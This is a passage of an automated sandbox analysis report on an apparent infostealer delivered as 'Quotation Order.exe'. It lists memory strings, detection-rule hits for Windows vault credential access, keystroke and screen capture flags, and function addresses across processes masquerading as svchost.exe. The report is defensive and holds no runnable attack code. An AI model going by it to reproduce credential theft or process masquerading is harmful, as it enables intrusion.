                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                    Source: svchost.exe, 00000024.00000003.1359171467.000002B80576B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                    Source: svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                    Source: svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                    Source: svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359102832.000002B805757000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                    Source: svchost.exe, 00000024.00000003.1358375444.000002B80575A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                    Source: svchost.exe, 00000024.00000003.1359383817.000002B805756000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1358393670.000002B805752000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359532181.000002B80572A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                    Source: svchost.exe, 00000024.00000002.2519246321.000002B805CBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf3
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/resetpw.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/retention.srf
                    Source: svchost.exe, 00000024.00000002.2518633439.000002B805C7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515629844.000002B804E9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com:443/RST2.srf
                    Source: svchost.exe, 00000024.00000002.2516513363.000002B804F13000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comwwCP=
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfi
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2517369366.000002B805737000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf(
                    Source: svchost.exe, 00000024.00000003.1359125029.000002B805740000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.2515177417.000002B804E60000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359150126.000002B805763000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf7
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
                    Source: svchost.exe, 00000024.00000002.2515032763.000002B804E40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
                    Source: svchost.exe, 00000024.00000003.1359079202.000002B80573B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://signup.live.com/signup.aspx
                    Source: svchost.exe, 00000003.00000003.1364324633.00000215E6C43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                    Source: svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1364293174.00000215E6C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1363948684.00000215E6C5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 00000003.00000002.1365960193.00000215E6C2B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                    Source: svchost.exe, 00000003.00000003.1364013063.00000215E6C58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.1366155272.00000215E6C59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiles.virtualearth.net/tiles/cmd/StreetSideBubbleMetaData?north=

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, 8WWn.cs; .Net Code: lkBm6YL8X
Source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, 8WWn.cs; .Net Code: lkBm6YL8X

System Summary

Source: 17.2.svchost.exe.1fc9f239308.2.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: 17.2.svchost.exe.1fc9f1fd6c0.1.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: 26.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: 17.2.svchost.exe.1fc9f1fd6c0.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: 17.2.svchost.exe.1fc9f239308.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers. Author: ditekSHen
Source: initial sample; Static PE information: Filename: Quotation Order.exe
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19CEC990_2_00007FF7C19CEC99
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C8DB80_2_00007FF7C19C8DB8
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C46000_2_00007FF7C19C4600
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19D4D250_2_00007FF7C19D4D25
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19CBD300_2_00007FF7C19CBD30
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C25280_2_00007FF7C19C2528
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19CC1110_2_00007FF7C19CC111
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C44B00_2_00007FF7C19C44B0
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19C8EF00_2_00007FF7C19C8EF0
                    Source: C:\Users\user\Desktop\Quotation Order.exeCode function: 0_2_00007FF7C19D4DB40_2_00007FF7C19D4DB4
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19BEC9915_2_00007FF7C19BEC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B44B015_2_00007FF7C19B44B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B8EF015_2_00007FF7C19B8EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B467115_2_00007FF7C19B4671
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B8DB815_2_00007FF7C19B8DB8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19C4D2515_2_00007FF7C19C4D25
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19BBD3015_2_00007FF7C19BBD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19B252815_2_00007FF7C19B2528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19BC11115_2_00007FF7C19BC111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C19C4DB415_2_00007FF7C19C4DB4
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 15_2_00007FF7C1A90D7115_2_00007FF7C1A90D71
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1988EF017_2_00007FF7C1988EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198467117_2_00007FF7C1984671
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1988DB817_2_00007FF7C1988DB8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198BD3017_2_00007FF7C198BD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198252817_2_00007FF7C1982528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198EC9917_2_00007FF7C198EC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C19844B017_2_00007FF7C19844B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C198C11117_2_00007FF7C198C111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C19874F017_2_00007FF7C19874F0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 17_2_00007FF7C1A60D7117_2_00007FF7C1A60D71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011EB07026_2_011EB070
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011EB4C826_2_011EB4C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011E4AD826_2_011E4AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011EEF0026_2_011EEF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011E3EC026_2_011E3EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_011E420826_2_011E4208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_0649C48026_2_0649C480
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_0649ABF826_2_0649ABF8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B65E826_2_064B65E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B55A826_2_064B55A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064BB22826_2_064BB228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B236026_2_064B2360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064BC17026_2_064BC170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B7D7826_2_064B7D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B769826_2_064B7698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064BE39826_2_064BE398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B004026_2_064B0040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B5CF026_2_064B5CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_069A34D026_2_069A34D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 26_2_064B000626_2_064B0006
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CCB19031_2_00CCB190
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CCA90831_2_00CCA908
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CC4AD831_2_00CC4AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CC3EC031_2_00CC3EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CCEFE831_2_00CCEFE8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_00CC420831_2_00CC4208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_06287D7831_2_06287D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_062855A831_2_062855A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_062865E831_2_062865E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628B22831_2_0628B228
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628236031_2_06282360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628C17031_2_0628C170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628769831_2_06287698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_06285CF031_2_06285CF0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628E39831_2_0628E398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628004031_2_06280040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 31_2_0628003B31_2_0628003B
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A467138_2_00007FF7C19A4671
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A8DB838_2_00007FF7C19A8DB8
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19ABD3038_2_00007FF7C19ABD30
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A252838_2_00007FF7C19A2528
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19AEC9938_2_00007FF7C19AEC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A44B038_2_00007FF7C19A44B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19AC11138_2_00007FF7C19AC111
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C19A8EF038_2_00007FF7C19A8EF0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 38_2_00007FF7C1A80D7138_2_00007FF7C1A80D71
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012BB4B843_2_012BB4B8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012B4AD843_2_012B4AD8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012BEF0043_2_012BEF00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012B3EC043_2_012B3EC0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_012B420843_2_012B4208
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_06697D7843_2_06697D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_066965E843_2_066965E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_066955A843_2_066955A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669B21743_2_0669B217
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669306843_2_06693068
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669C17043_2_0669C170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669769843_2_06697698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_06695CDF43_2_06695CDF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669235343_2_06692353
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669E39843_2_0669E398
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669004043_2_06690040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669003F43_2_0669003F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 43_2_0669000643_2_06690006
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C191EC9952_2_00007FF7C191EC99
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19144B052_2_00007FF7C19144B0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C19174F052_2_00007FF7C19174F0
                    Source: C:\Users\user\AppData\Roaming\svchost.exeCode function: 52_2_00007FF7C1918DB852_2_00007FF7C1918DB8
